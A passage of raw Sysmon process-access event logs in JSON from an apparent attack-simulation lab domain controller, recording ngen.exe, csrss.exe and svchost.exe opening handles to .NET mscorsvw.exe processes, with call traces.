C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.695","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.695\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.695","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.695\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.742\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010936E0C00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.742","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010936E0C00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.742\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010936E0C00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.742","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010936E0C00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010936E0C00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010936E0C00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.773\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-001066720C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.773","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-001066720C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.773\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-001066720C00}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.773","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-001066720C00}","TargetProcessId":"4548","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
